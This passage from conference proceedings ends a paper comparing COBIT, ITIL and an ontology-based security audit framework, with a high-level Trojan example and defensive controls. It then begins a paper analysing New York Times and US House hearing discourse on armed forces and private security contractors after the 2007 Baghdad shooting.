control framework. ITGI is a not-for-profit research organization affiliated with the Information Systems
Audit and Control Association (ISACA) focused on IT governance, assurance and security. ITGI
undertakes research and publish COBIT, an open standard and framework of controls and best practice
for IT governance which provides guidelines on what can be done in an organization in terms of control
activities, measurement and documentation of processes and operations.
The primary focus of COBIT is on aligning use of IT with the achievement of organizational goals. The
combination of business and IT goals promoted by the COBIT framework enables the ability to monitor
the information system.
COBIT Framework consists of a 34 high-level control objectives, contains over 300 detailed IT controls
and is validated to reach a balance between IT risks and investments in IT controls. The control
objectives have been organized into a hierarchy of processes and domains that are designed to help
bring alignment of business and IT objectives, by identifying the requirements for IT resources and
information associated with the detailed control objectives. IT processes are grouped into four domains:
planning and organization, acquisition and implementation, delivery and support and monitoring.
The conceptual COBIT framework can be approached from three points: (1) information criteria, (2) IT
resources and (3) IT processes. These three points are depicted in the COBIT ‘s Cube.
Figure 1: The COBIT Cube, source (ITGI 2000)
To satisfy business objectives, information needs to conform to certain control criteria, which COBIT
refers to as business requirements for information. Based on the broader quality, fiduciary and security
requirements, seven distinct, certainly overlapping information criteria are defined as follows (ITGI 2000):
Effectiveness deals with information being relevant and pertinent to the business process as well as
being delivered in a timely, correct, consistent and usable manner.
Efficiency concerns the provision of information through the optimal use of resources.
Confidentiality concerns the protection of sensitive information from unauthorised disclosure.
Integrity relates to the accuracy and completeness of information as well as to its validity in
accordance with business values and expectations.
Availability relates to information being available when required by business process now and in the
future. It also concerns the safeguarding of necessary resources and associated capabilities.
Compliance deals with complying with those laws, regulations and contractual arrangements to which
the business process is subject, i.e., externally imposed business criteria.
2 www.itgi.org
316

Teresa Pereira and Henrique Santos
Reliability relates to the provision of appropriate information for management to operate the entity
and for management to exercise its financial and compliance reporting responsibilities.
IT resources are managed by IT processes to achieve goals that meet the business requirements of
organizations. This principle of COBIT framework is illustrated in Figure 1. The IT resources
identified in
COBIT can be defined as follows (ITGI 2000):
Data are objects in their widest sense, structured and non-structured, graphics, sound, etc.
Application Systems are understood to be the
sum of manual and programmed procedures.
Technology covers hardware, operating systems, database management systems, networking,
multimedia, etc.
Facilities are all resources to house and support information systems.
People include staff
skills, awareness and productivity to plan, organise, acquire, deliver, support and
monitor information systems and services.
From the point of control and information systems audit, COBIT provides the Audit Guidelines, which is a
complementary tool to facilitate the application of the COBIT Framework and Control Objectives within
audit and assessment activities. The purpose of the Audit Guidelines is to provide a structure for auditing
and assessing controls based on generally accepted audit practices that fit within the overall COBIT
scheme. The COBIT Audit Guidelines enable the auditor to review specific IT processes against COBIT’s
recommended control objectives to help assure management where controls are sufficient, or to advice
management where processes need to be improved (ITGI 2000). Therefore the IT process is audited by:
Obtaining an understanding of business requirements related risks, and relevant control measures;
Evaluating the appropriateness of stated controls;
Assessing compliance by testing whether the stated controls are working as expected, consistently
and continuously way;
Substantiating the risk of control objectives not being met by using analytical techniques and/or
consulting alternative sources.
The audit guidelines assist the auditor to provide assurance that the process is actually under control and
the information requirements enable to achieve business
objectives.
3. ITIL
The ITIL was
developed by the British government between 1989 and 1995 as a best practice framework
for IT service
management. ITIL was published by Her Majesty’s Stationery Office (HMSO) in the UK on
behalf of the Central Communications and Telecommunications Agency (CCTA), now included within the
Office of Government Commerce (OGC 3 ). The ITIL V2 became universally accepted and is now used in
several countries by many organizations as the basis for effective IT service provision. In 2007 a new
version of ITIL arise, resulting in a consolidated third version of ITIL. The main mechanism addressed by
ITIL is the concept of a service, which is defined in ITIL V3 as follows: “A service is a means of delivering
value to customers by facilitating outcomes customers want to achieve without the ownership of specific
costs and risks” (ITIL 2007). All service solutions and activities should be conducted by business needs
and requirements. In this context service solutions and activities must reflect the strategies and policies of
the organizational service provider. ITIL is based on defining best practices processes for IT service
management and support, rather than on defining a broad-based control framework. The key activity is
the definition of a continual service improvement, which drives maintenance of value delivery to
customer.
IT service management is concerned with planning, sourcing, designing, implementing, operating,
supporting
and
improving IT services that are appropriate to business needs. The role of the ITIL
framework is to describe approaches, functions, roles and processes, upon which organizations may
base their own practices and to give guidance at the lowest level that is applicable generally.
The ITIL V3 service management is broken into five distinct phases (ITIL 2007) (Woods 2010):
ITIL Service Support;
ITIL Service Delivery;
3 www.ogc.gov.uk
317

ITIL Transition;
ITIL Operation;
ITIL Continual Service Improvement.
Teresa Pereira and Henrique Santos
4. A framework developed
to audit information system security, based on a
ontology
The establishment of ISO/IEC_JTC1 standards promoted the standardization of the semantic concepts
defined in the information security domain. The correct understanding and identification of those concepts
are the primarily requirement to be considered in the performance of a proper examination of the
information system security effectiveness, and further to identify and characterize an occurred security
incident, as well as to estimate its impacts. The proposed conceptual framework is based on the security
standard ISO_/IEC_JTC1 and intends to assists the organization, firstly to precisely determine what
should be protected (the assets) and their weaknesses (vulnerabilities) involved in their daily activity.
Secondly assess what vulnerabilities can be exploited by an attack, as well the threats that might be
materialized in an attack. Finally, evaluate the efficiency and the effectiveness of the policy and controls
implemented, in order to evaluate if they are being correctly implemented or if they need any adjustment
(Pereira & Santos 2010a).
The Figure 2 illustrates the conceptual framework proposed, presenting these three nuclear concepts:
attack, threat and assets. The
auditor can select the concept from which he/she intends to start the
auditing
process, and proceed to the directed related concepts. Each concept contains a list of elements
that are linked to the other concepts, conforming to the hierarchical structure of the semantic concepts,
defined in the ontology (Pereira & Santos 2010b). These three concepts were included in the front-end of
the framework, rather the others, due to the nature of the audit operation, which the auditor intends to
perform.
Figure 2: Print screen of the developed framework
Traditionally, a security audit is conducted once an incident has occurred (reactive followed by a
corrective audit), that is when an asset has been compromised.
In this case, an audit is requested in
order to determine the source of the attack and how the incident happened, proceeding with the
adequate corrective mechanisms. However a security audit is not only about investigating security breakins,
but rather to mitigate recognized threats, in order to ensure: (1) the security compliance; (2) the
security of critical assets; (3) the right controls are in the right place. In this last view a security audit is
performed in the context of the security risk management process, and aims to produce or evaluate a
security policy.
Being conducted by the main concepts and their relationships defined by an ontology, the proposed
framework intends
to assist organizations to understand, prepare and perform security audits, by
themselves.
This framework does not focus exclusively on technical controls involved with information
318

Teresa Pereira and Henrique Santos
security, but enforces procedures and practices to assist organizations to maintain consistently high
levels of useful and good quality information concerning their information security systems.
Within the ontology, each concept is mapped to real subjects. For example if the auditor starts to conduct
the auditing through the attack concept, usually it means that a security incident occurred and
the auditor
must
perform a depth analysis of the attack and analyse the implemented controls, in order to detect the
security breach. The related concepts represented in the ontology, are illustrated in Figure 3 and briefly
described:
The vulnerability explored by the attacker;
The assets
affected;
The security properties that were compromised; and
The controls implemented
to detect the attack.
Figure 3: Hierarchical structure of the concept attack (for additional details see (Pereira & Santos
2010a))
319

Teresa Pereira and Henrique Santos
As it was demonstrated in the ontology, each concept is mapped to real subjects. An instance of this
logical structure can starts for example with one instance of an attack and followed by the available
connection/link to the affected assets by the attack, the vulnerability it explores, and the security
properties that have been compromised. Instances to these concepts are followed presented:
Attack – a Trojan horse.
Vulnerability - Flaws in the Web browser; email attachment mechanism; download files applications. As
Trojans are executable programs, when the user opens an e-mail attachment or a downloaded file, the
Trojan is installed in the background. Trojans installers can also be automatically downloaded as ActiveX
controls or other malicious content when the users visit malicious web sites.
Assets – Users computer; private data.
CIA – Confidentiality and integrity.
Threat – Modification.
Controls – A list of mechanisms used to detect a Trojan is followed presented:
Installation of anti-virus software. Antivirus programs will enable to catch some of the most popular
malware.
Installation of anti-Trojan software. Antivirus software is not effective against some Trojans.
Addition of a firewall.
Block executable files from the email.
Alert the user to never type commands that others tell them to type, or go to a web addresses
mentioned by strangers, or run pre-fabricated programs or scripts (not even popular ones).
The standard and consequently the ontology, do not go into fine grain details concerning concepts
characterization when different views are possible. Currently attacks, vulnerabilities and controls are
often described differently by different organizations. For each of these concepts is associated to a
taxonomy aimed to classify security attacks, vulnerabilities and controls, and providing a structured way
of viewing them. For the attack is used the Bishop taxonomy (Bishop 2004), for the vulnerabilities is used
the CVE (Common Vulnerabilities and Exposures 4 ) taxonomy and for the controls is used the taxonomy
presented in the security standard ISO/IEC FDIS 27001:2005(E) (ISO/IEC_JTC1 2005). The uses of
taxonomies enable to achieve a better and uniform characterization of each instance, taking in account
different views, purposes or even perceptions. However there is nothing limiting the possibility of
extending concept classes, for instance defining attack classes with common characteristics, all deriving
from the same main fundamental class. This is demonstrated in the framework and illustrated in the
Figure 4 and Figure 5. This feature gives the possibility of customization, but with the risk of lost of
generalization, if not used carefully.
Despite the large amount of information available to complete a basic ontology, we accept that each
organization will develop its own view of security awareness. The framework is modular concerning this
aspect, allowing evolving the ontology by adding the relevant subjects. This way, the auditor may
proceed through the examination of the relevant vulnerabilities in the assets that can compromise the
security of the information system, within the organization; or the auditor may go along with the analyses
of new threats that might be materialized in an attack.
Additionally, the proposed framework includes the typical functions of similar tools, enabling a set of
functionalities, like the possibility of the auditor to generate a report with all steps performed, as well as
the registration date of the
audit. According to the results of the auditor’ examinations, he can also
schedule
in the calendar the next audit. Moreover, if the auditor during his examination detects a new
incident, i.e. an attack that is not presented on the list of attacks, the auditor should report this new attack
with its features, which will be validated by the administrator of the framework and, after that, the
administrator will index the attack to the list of attacks. This procedure is the same if the auditor decides
to conduct the audit through the examination of the assets or threats and during
the process identifies a
new
vulnerability in an asset or a new threat.
4 http://cve.mitre.org/
320

Figure 4: An instance of the concept attack
Teresa Pereira and Henrique Santos
Figure 5: An instance of the concept attack related the asset concept
The key role of this framework is to assist the auditing process and promote improvements to the current
methodologies available for information security management.
5. Comparison of COBIT, ITIL and the Developed Framework
The general function of COBIT and ITIL, and the developed framework are different in several aspects.
The main difference between the three approaches are followed presented:
COBIT focus on control objectives and IT metrics. While ITIL aims to map IT service level
management. The framework developed is focused on general security domain.
The COBIT creates documents of the processes and operations, and ITIL key rule is the continual
improvement. While the framework developed enforce the continual improvement as well, and it also
enables to add new security contents to the security management process.
COBIT Audit Guidelines provides a complex structure for auditing and assessing controls. And ITIL is
based on best practices for management and to support services. While the framework developed
provide security model based on security standards (ISO/IEC_JTC1).
COBIT Audit Guidelines and ITIL best practices are “one-size-fits-all” solutions. While the framework
developed provides a base model, which evolve with organizations business requirements; and
promotes the sharing of security context since it follows an ontological approach.
321

6. Conclusions and future work
Teresa Pereira and Henrique Santos
The information system security audit is not (or should not be) a one-time task, but a continual effort to
improve the protection of the organization assets and consequently to assure the normal functioning of
the organization activity. Regular audits should be planned to analyze the effectiveness of the security
policies, practices, measures and procedures implemented within the context of the organization’s
structure, objectives, activities and its particular view of risks. As a result, the auditor should conduct his
tasks accordingly to his experience and through the use of available frameworks, to assist the auditor to
perform his work. COBIT and ITIL are currently widely used frameworks in several organizations.
However they are very different in their orientation, definition and class of problems they address and the
specific implications regarding implementation.
In this paper, we presented these two standards and established a comparison between them and the
developed framework, which is based on a conceptual model approach, to support the auditor conducting
an audit, in an information system security, within the context of a given organization. This solution
introduces a new perspective to model information, in the security domain and has some advantages
regarding COBIT and ITIL solutions. It enables the description of the data semantics and promot es
firming up and unifying the concepts and terminology
defined in the scope of information security, based
on the relevant ISO/IEC_JTC1 standards. Furthermore,
it enables an organization evolving its own
instantiation of the security ontology, obeying to standard concepts, but embedding its one view and
assumed risk exposition.
As future work we intend to implement the necessary adjustments to integrate further functionalities, e.g.,
direct link to attack and vulnerabilities description databases, alert mechanism for ontology outdate and
continuous monitoring of security controls to promote early detection of security policies breaks.
References
Bishop, M., 2004. Introduction to computer security, Addison-Wesley Professional.
ISO/IEC_JTC1, 2005. ISO/IEC FDIS 27001 Information Technology - Security Techniques - Information Security
Management Systems - Requirements, Geneva, Switzerland.: ISO copyright office.
ITGI, 2000. CobiT Audit Guidelines. Available at: http://techtraining.brevard.k12.fl.us/BETC2007/Grachis-
Auditguidelines.pdf.
ITIL, 2007. An Introductory Overview of ITIL V3. London: The UK Chapter of the itSMF.
Pereira, T. & Santos, H., 2010a. A conceptual model approach to manage and audit information systems security.
9th European Conference on Information Warfare and Security. Thessaloniki, Greece: Josef Demergis,
University of Macedonia Thessaloniki Greece, pp. 360-366. Available at: http://academicconferences.org/eciw/eciw2011/eciw10-proceedings.htm.
Pereira, T. & Santos, H., 2010b. A Security Audit Framework to Manage Information
System Security. Em 6th
Intrenational Conference, ICGS3 2010. Global Security, Safety, and Sustainability Communications in
Computer and Information Science, 2010. Braga, Portugal: SpringerLink, pp. 9-18. Available at:
http://www.springerlink.com/content/gx40481t26025266/.
Woods, T., 2010. Data Storage Management. Implementing ITIL: Getting started with ITIL V3 service management.
SearchStorage.com.
322

Fight Over Images of the State Armed Forces and Private
Security Contractors
Mirva Salminen
University of Lapland, Finland
msalmine@ulapland.fi
Abstract: Images of participants in conflicts held by military leaders, top politicians and administrators as well as the
general public make a difference both in conflicts and in times of peace. The images do not only have practical
implications in warfare, but also far reaching influence in people’s shared understanding. The shared understanding,
again, is the arena on which suggested truths are either accepted or rejected and therefore, an arena for power
struggles. Production and control over the emergence, existence and disappearance of different images of
participants in conflicts have hence become goals of information warfare. The topic of this paper are the images
produced firstly, of soldiers of the state armed forces and secondly, of employers of Private Security Contractors
(PSCs). The production of these images is carried out both in discursive and non-discursive practices. This paper
focuses on discursive production of the images with the help of descriptions given and pictures presented on the
participants in conflicts. The two aforementioned imageries are examined for the reason that in the shared
understanding they serve as a binary category: the armed forces functions as a norm against which the existence
and conduct of private security contractors are evaluated. Data of the study consists of writings and pictures
published in The New York Times (NYT) after a shooting in Baghdad in September 2007 and commenting on the
shooting. In addition, the paper examines discussion in the US House of Representatives Committee on Oversight
and Government Reform (HCOGR) hearing held 2 nd of October 2007 which discussed the matter of PSCs operating
in Iraq and in which CEO of the company accused of misconduct in relation to the aforementioned shooting
witnessed. The questions under scrutiny are who has the right to speak and what kinds of images circulate in the
data as well as how these images produce the binary category of the armed forces – private security contractors into
the shared understanding. The role of PSCs is likely to grow in the complicated conflicts of the future and therefore,
how political and military decision making and people’s shared understanding manages them is important.
Keywords: images, collective meaning production, armed forces, private security contractors
1. Introduction
In the course of the war in Iraq, the American people were introduced with private security contractors.
Repeated pieces of news describing scandals in which PSCs and their employees entangled produced
PSCs as participants in conflicts into people’s shared understanding. The fact that security contractors
were mainly produced in the context of scandals framed them as primarily negative and avertable actors.
However, at the same time another line of descriptions circulated in the discussion. According to this line,
PSCs should be given credit from the work they do, and the protection they are providing to US state
officials and dignitaries working or visiting in Iraq should be recognised. Hence, PSCs and their
employees should rather be seen positively as “[...] our team working in [...] a war zone (Turner, HCORG
2007, 83)”.
How the general American public perceives security contractors is important, because those perceptions
create the space, as well as the limits of that space within which political, administrative and military
decisions concerning PSCs can be made. In an ideal, transparent democracy an illegitimate decision that
would hold for long cannot be made and therefore, people’s perceptions and their accordance with the
deliveries of public decision making are valued. However, alongside fine tuning decisions to follow
perceptions, people’s shared understanding is an arena for power struggles over generally accepted or
acceptable truths about PSCs. Simultaneously information warfare is the practice utilised to construct
those truths and images the means for waging that war. This can be seen as an aspect of the war in Iraq
in which warfare is understood as fight over the production of and control over images (Rantapelkonen
2008, 65; 82).
Fighting over images of PSCs operating in Iraq intensified after a shooting incident in Baghdad on
September 16 th , 2007. Recourse to violence by a team of PSC employees that lead to the killing of
seventeen Iraqis served as an acceleration point for multiple information operations aimed at influencing
the American public and thus, either at legitimising or outlawing the use of security contractors in conflict
zones. In these operations, images of the state armed forces were used as a norm against which PSCs’
and their employees’ conduct was evaluated. The commonly suggested image of the armed forces was
that of a patriotic and righteous state agency executing a policy that furthered American interests abroad.
In these descriptions soldiers were under direct state control and therefore, their actions could be trusted
to be in the best interest of the United States – unlike PSC actions seemed to be. The September 16 th
323

Mirva Salminen
shooting and the discussion related to it became important because of the number of casualties, of strong
Iraqi expressions of anger and of claims that similar PSC behaviour was frequent. Moreover, the incident
forced the US administration to revise its contracting and supervising practices and is still in the
contemporary discussion often referred to. Thus, it can be argued that the shooting has importantly
framed the overall discussion on private security contractors.
As this paper does not examine the perceptions that the American people hold on PSCs, but information
operations aimed at influencing those perceptions, it concentrates on studying articles, columns and
editorials published in The New York Times from September 18 th , 2007 to October 3 rd , 2007 as well as a
discussion in the House Committee hearing on PSCs which was widely commented on in the newspaper
on the last day of the examined time period. This data was selected because of the particular position
given in the shared understanding to news media as neutral speakers of truth. News media is not the
only channel through which information is disseminated. However, information presented, for example, in
newspapers is believed to have gone through intense processes of verification before publishing and is
hence read as true (Ridell 1994, 26-29) The New York Times particularly holds this kind of appreciated
position as an information funnel - not only in the United States, but more widely in the world. For similar
reasons the congressional hearing was included in the data. Politicians in powerful positions do not only
consist part of the people whose shared understanding is influenced, but also act as information funnels.
Due to their privileged position they are believed to have superior knowledge on important issues and
therefore, what they say is worth reporting in itself. In this way, congressmen’s perceptions become
repeated in media which increases their truth value. (Kunelius et al. 2009 33-34, 315-326)
2. Research and paper design
Before going into details about how the study of images and their use is conducted in the paper, some
central concepts are in need of clarification. Firstly, information warfare is understood as a broad
category of practices utilised to manage the flow of information - including the practices used to generate
information as well as to degenerate and deprive information - and thus, to manage the emergence,
existence and disappearance of different images from the shared understanding (Rantapelkonen 2008,
72; Foucault 2009, 42). In other words, information warfare is approached as a combination of practices
aimed at turning information into knowledge and thus, constituting truths about private security
contractors (see Huhtinen & Rantapelkonen 2002 24-28). Secondly, what is meant with images are
understandings produced by the use of discursive formations and pictures, and which are propagated as
truths. Discursive formations, again, are systems of dispersion which separate and relate statements to
one another into meaning producing sets, that is, images. They are recognisable through the succession
and co-existence of statements in them as well as through intervening processes that change them. In
other words, a certain set of rules binds the production of images and create meanings in them. (Foucault
2009, 37-41; 62-66.)
This paper examines aforementioned images and the fight in which discussants position those images to
each other. The examination begins with recognising the discussants that have the right to attend the
discussion about security contractors. Not everyone can be heard in the discussion, but only those who
occupy an acknowledged speaker’s position can have their say. (Foucault 1998, 11.)
The study then moves on to presenting imagery of both, the state armed forces and PSCs. Through close
reading of data typologies of images were produced. In this process, it soon became clear that regardless
of whether the images of PSCs and their employees were negative or positive, they were relative to and
dependent on the images of the armed forces. For the discussants PSCs do not have an independent
existence, but they are to be defined in relation to the state armed forces. Even statements such as “[...]
we are not talking about the military here at all [...] (Issa, HCOGR 2007, 86)” still require an image of the
armed forces in order to be meaningful. Pictures are seen as part of the discourse and either supporting
or challenging the discursive descriptions (see Rose 2001, 136-138). Therefore, their analysis is tied to
the analysis of verbal descriptions.
The paper finishes with presenting observations about the durability of examined images, the future of
newspapers as information funnels which has been challenged by the rise of more participatory media
and the solidity of the binary category in non-state-related discussions on PSCs.
3. The discussants
The speaker’s positions recognised in the newspaper and in the House Committee hearing are similar.
Plenty of audible room is given to the representatives of both, US and Iraqi governments and
324

Mirva Salminen
administrations. These discussants have been granted the authoritative right to comment on the
September 16 th shooting, although their speaker’s positions are not similar. The US representatives, who
represent the agencies using PSC services, are seen to have inside information and knowledge about
contracting and contractors. They are granted the authority to inform the American people about the
shooting and its investigations. The Iraqi representatives, who speak for the people who are directly
influenced by PSC actions, are given the role of representatives of the victims who demand their rights.
They can also provide information on the shooting and are allowed to bring accusations of PSC
misconduct onto the discussion agenda as well as to claim respect for Iraq’s self-imposition. (Salminen
2010, 82-83.)
The New York Times itself acts as a discussant, when it publishes news articles, columns and editorials
commenting on the shooting and on the whole issue of private security contractors (Salminen 2010, 24-
25). More accurately, the newspaper’s reporters act as discussants. They have been granted their
speaker’s positions as representatives of the media who have the right to inform people. Voices of the
victims and bystander witnesses of alleged misconduct, both Iraqi and American, can also be heard in
the discussion. They may not directly attend the discussion, but can have their say in newspaper
interviews, interviews conducted during the compilation of governmental reports or in letters put in front of
the House Committee hearing as pieces of evidence. These victims and bystanders are given the right to
speak because of their personal experiences of the contractors’ conduct. Experience can also serve as
justification for an expert to be given floor in the discussion. Therefore, statements of numerous
anonymous “contracting officials” or “representatives of the contracting industry” appear in the discussion.
An expert can also gain speaker’s position because of his long engagement in the study of warfare and
conflicts or of governmental outsourcing. (Salminen 2010, 147.)
A particular form of expert knowledge and speaker’s positions based on that knowledge are the positions
hold by representatives of PSCs and of the state armed forces. Blackwater, the contractor involved in the
shooting, speaks primarily through its spokeswoman and statements released from the company’s
headquarters, but when the company’s CEO was asked to perform in the House Committee hearing his
statements became prospective sources of truth as well. The CEO’s expertise was not acknowledged
only because he was the CEO, but also because he was a former member of US Navy’s special
operations force who after his military career had founded Blackwater. In the hearing he was thanked for
his military service and it was widely presumed that the experience he gained in the armed forces had
facilitated his later activities (Welch, HCOGR 2007, 108). In other words, the CEO’s credibility as a
source of truth claims was dependent on his military experience. This is an example of practices through
which the binary category, the armed forces – security contractors, has been established.
The speaker’s position of members of the state armed forces is based on expertise that they have gained
while serving in the institution responsible for US military and security operations. The armed forces are
believed to have best knowledge of the overall situation in Iraq as well as of the conduct of military-like
security operations. Therefore, they are even expected to comment on PSC issues and listened very
carefully when they do so. Even when it is recognised that the armed forces do not have training or
willingness to take over tasks allocated to PSCs, they are demanded to do so or at least, to expand their
control and oversight to PSCs working for all US state agencies (Watson, HCOGR 2007, 85‒86; NYT
editorial, 01.10.2007). This is another example of how the aforementioned binary category is produced.
4. Imagery of members of the state armed forces and of security contractor
employees
4.1 Typologies of discursive descriptions
Descriptions given of members of the state armed forces in the data are straightforward. Soldiers fighting
for the United States, firstly, were in Iraq voluntarily and were making great sacrifices. They were
described as patriotic people, whose “[...] pay [did] not reflect their value, but [who did not] complain [...]
(Waxman, HCOGR 2007, 3)” and who without questions followed orders given to them. In these
descriptions, soldiers may also die albeit the war is expected to be waged in a manner which optimises
force protection. Secondly, the United States was acknowledged to “[...] have the best troops in the world
(Waxman 2007, 2)”; capable of anything, if they only had the right training and equipment as well as
enough personnel. This was accepted as an unquestionable fact in the discussion. In addition, they came
from several ethnic and educational backgrounds which only enhanced their abilities (Platts, HCOGR
2007, 83-84). Even Blackwater CEO agreed to this fact and declared his employees of being a
325

Mirva Salminen
supplement to the US military by filling in “a specialty gap” (Prince, HCOGR 2007, 85-86). In relation to
this, thirdly, the state armed forces were acknowledged of not being capable or willing to do everything.
Soldiers had not been trained for everything and it was not even meaningful for them to perform all tasks.
Fourthly, the US soldiers were described as being humane, that is, willing to help the Iraqis and to take
their concerns into consideration (NYT 22.09.2007).
Fifthly, members of the armed forces appeared in the roles of incident investigators and of the highest
security authorities in Iraq. What soldiers stated about circumstances and trajectories were accepted as
true. Thus, there appears to be conflict over soldiers’ statements as well. The New York Times quoted
negative statements about PSCs provided by members of the armed forces (NYT 28.09.2007b), as did
the speakers in the House Committee hearing (Waxman 2007, 73-74). In response, Blackwater CEO told
in the hearing a story about a colonel thanking him for having his employees in Iraq to safeguard soldiers’
backs (Prince 2007, 74). In relation to this, sixthly, the armed forces were seen as the agency which
would have to take care of all tasks in conflict zones in case no other actor was available (NYT
20.09.2007b). They functioned as the US backbone and therefore, their capabilities and resources should
not be reduced due to outsourcing of the state’s military and security related tasks. Moreover, it was
suggested that the armed forces should perform PSCs’ tasks, because these tasks were integral to the
overall operation in Iraq and to US foreign policy, and because there were procedures to keep members
of the armed forces accountable and responsible - unlike PSCs (Tierney, HCOGR 2007, 79).
As it can be seen from the descriptions above, images of the state armed forces are primarily positive.
On the contrary, the dominating images of PSCs and their employees are negative, although contested.
As PSC images are more numerous and varying than those of the armed forces their prime types are
presented in the following table 1.
Table 1: Prime types of discursive descriptions of private security contractors
primarily negative images primarily positive images
war profiteers private companies protectors
a good deal
secretive, murky businesses political pets
representatives of USA part of the nation’s total force
abusers of the armed forces patriots
risks or dangers necessities
entities above law
reckless cowboys
criminals
mercenaries
entities under state control
unqualified amateurs
abusers of their employees
enemies of the Iraqis
civilians
highly-trained professionals
The above presented typology is not exhaustive. Speakers often combined statements that position
PSCs to several of the aforementioned images, and hence providing a straightforward typology is
impossible. Thus, the aforementioned images are relational and dependent on each other rather than
exclude one another. In addition, sometimes positive sides of a negative image were recognised, for
example, when it was negatively claimed that PSCs lure active members away from the state armed
forces, it was also positively recognised that prior military experience enhanced the skills of PSC
employees (Clay, HCOGR 2007, 82; NYT 20.09.2007b). On the other hand, negative sides of a positive
image were recognised, when PSC were acknowledged of safeguarding US representatives in conflict
zones, but also said to endanger the lives of Iraqi bystanders (NYT 18.09.2007; 19.09.2007). Of the
images listed in the central column of table 1, “private companies”, “representatives of USA” and
“civilians” are not negative or positive per se, but depending on the context can be both. “Criminals” and
“mercenaries” are listed as sub-categories to “entities above law” and “political pets” are a special form of
images of “secretive, murky businesses”.
As said, quantitatively the main tone in the discursive descriptions was negative. PSCs were claimed to
benefit disproportionally from the war thanks to their political connections. This also took place at the
expense of their own employees, of the armed forces and of US taxpayers. In addition, political affiliations
326

Mirva Salminen
enabled the US administration to wage an unpopular war without the support of the American people,
that is, undemocratically. (Kucinich, HCOGR 2007, 65-66; Yarmuth, HCOGR 2007, 88-89; NYT
28.09.2007a.) In this way, the administration was betraying the principles on the basis of which the
United States had been built and deteriorating the moral stance of the state (see Harle 2000, 81-83). In
addition, and unlike the armed forces, PSCs were claimed to primarily serve the profit motive instead of
US interests (Tierney 2007, 77).
In counter-arguments, PSC employees were presented as proud and dedicated Americans who after
having served in the armed forces continued their service while working for PSCs. PSCs, on their behalf,
associated with the United States and could not operate against US interests due to existing legal
restrictions. (Prince 2007, 100.) In further counter-arguments, it was stated that a large proportion of PSC
employees were not Americans and thus, amongst other things, fulfilled the definition of mercenaries
(Norton, HCOGR 2007, 118). Mercenary claims existed only in The New York Times columns and
editorials, not in the news articles and in the House Committee hearing the concept was referred to less
than ten times. Unsurprisingly, representatives of PSCs and of their customers fiercely denied the
applicability of the mercenary claim.
In the discussion, private security providers were often alleged to be risky or dangerous. There were
numerous moral, economic, political, military and security concerns attached to them. Most importantly,
PSCs were regarded of not being under any legislation – they had been exempted from the Iraqi law and
neither the US civilian nor military law had been applied to them in practice. The preferred legislation to
be expanded to PSCs and their employees was the US military legislation. (Krugman 28.09.2007; NYT
20.09.2007b; 27.09.2007.) Not only concerned politicians and experts were of that opinion, but
representatives of PSCs as well. This, again, is one of the ways in which PSCs emerge in relation to the
state armed forces. However, with regard to this claim some problems arose. Firstly, some of PSCs and
their employees operated in the civilian capacity, not in the military one. It was asked, whether civilians
could be held responsible under military jurisdiction. (McCollum, HCOGR 2007, 97.) Secondly,
representatives of the Iraqi administration preferred PSCs to be brought under Iraq’s legislation, which
was opposed by the Americans (NYT 23.09.2007).
PSCs and their employees were not only seen as being above law and behaving accordingly and thus,
endangering innocent Iraqi lives (NYT 19.09.2007; 20.09.2007a). They were also accused of not being
properly screened or supervised. Along with the lawlessness claim, this was the main concern in the
discussion and expressed in many several ways. The allegation was contested by statements that
testified about strict intra-company qualifications and those of the customer, that is, of the US state
agencies (Davis 2007, 14; Prince 2007, 94). In addition, PSCs and their employees were recognised of
representing the United States to the Iraqi people and therefore, with their unprofessional and reckless
conduct endangering the US foreign policy (NYT 27.09.2007). This claim was also presented in a positive
light, when legitimisation was sought for contractors by recognising them as part of the overall US force in
Iraq. With their extensive experience and specialised skills PSC employees were contributing to the
overall force.
Regardless of the quantitative domination of negative images, strong positive ones stood against them.
Some of these positive images have been presented above. In addition, PSCs were in the discussion
presented as effective and efficient, even heroic protectors. None of their principals had been killed or
seriously injured in Iraq, while many PSC employees had lost their lives in their work (Shays, HCOGR
2007, 68). Outsourced security services were also seen as a good deal for the US administration,
because in this way soldiers were released from doing secondary tasks to fight the war and because
PSCs were providing the secondary tasks in cost-efficient and flexible manner (Prince 2007, 23-24).
However, the latter claim was often challenged with accusations of over-billing (Duncan, HCOGR 2007,
80; NYT 02.10.2007). The necessity of PSCs in conflict zones was also acknowledged in the discussion,
when it was stated that the current US military and security operations could not be conducted without
contractors. The prime counter-argument to this was that it was not a good policy to be dependent on
contractors in military operations or in foreign policy. (NYT 24.09.2007; 03.10.2007a.)
4.2 How are the descriptions supported with pictures?
There are eight pictures directly attached to news articles published on The New York Times pages. Of
these only one actually presents PSC employees (18.09.2007). It was published alongside the first news
article presenting the shooting and thus, also visually introduced private security providers to the readers
of the newspaper. In the picture, two heavily armed men who are not wearing uniforms move around an
327

Mirva Salminen
armed vehicle. A third, similarly equipped man occupies the shooter’s position inside the vehicle. From
the surroundings it can be concluded that they are on a street inside housed quarters of some non-
Western town. Visual similarities between appearances of the men and their equipment in the picture and
those of soldiers are striking. No wonder that in the discussion it was claimed that the Iraqi people are not
differentiating between US soldiers and PSC employees (Cummings, HCOGR 2007, 61).
In addition, there are four pictures of the incident scene or pictures that present the consequences of the
shooting (21.09.2007; 28.09.2007b; 03.10.2007b), two facial close-ups of Blackwater CEO (27.09.2007;
03.10.2007a) and a picture of Iraq’s prime minister speaking while standing next to a flag of Iraq
(24.09.2007). The incident scene pictures are used to visualise the course of events on September 16 th
or to witness about the horrendous impact that the force used on that day had on its targets. In the latter
case, the main role is given to a charred white car towards which Blackwater employees launched a
series of fire. Pictures of Blackwater CEO are used to give a face to the company. In the shared
understanding, PSC is a relatively abstract entity, which becomes more tangible when it is personified to
its CEO. Picture of the Iraqi prime minister is published next to a news article telling how the prime
minister had claimed that PSCs challenge the sovereignty of Iraq and thus, it reinforces the message
delivered in the article.
5. Conclusion
This paper has presented the discussants allowed to attend discussion on private security contractors on
the pages of The New York Times and in the House Committee hearing. It has also presented imageries
of the state armed forces and of PSCs which are utilised in the production of PSCs into the American
shared understanding by establishing a binary category with the armed forces. It has to be noted that
most of the images presented here are not specific to the discussion about the September 16 th shooting,
but existed before and have maintained their existence thereafter. Neither they are specific to the
medium examined, but are present, for example, in academic texts, blogs as well as on discussion
boards on internet. However, framing of the topic varies according to the medium as does the acceptance
of discussants, and more research on these matters is required.
While the emergence of more participatory media has changed and keeps on changing knowledge
production practices, newspapers and other news media are likely to preserve their position as
information funnels. Topics and images rise onto discussion agenda from more varied sources than
solely news reports and are kept there by a number of actors, which has made the successful conduct of
information operations difficult. Practices of news media duplicate the suggested images and thus,
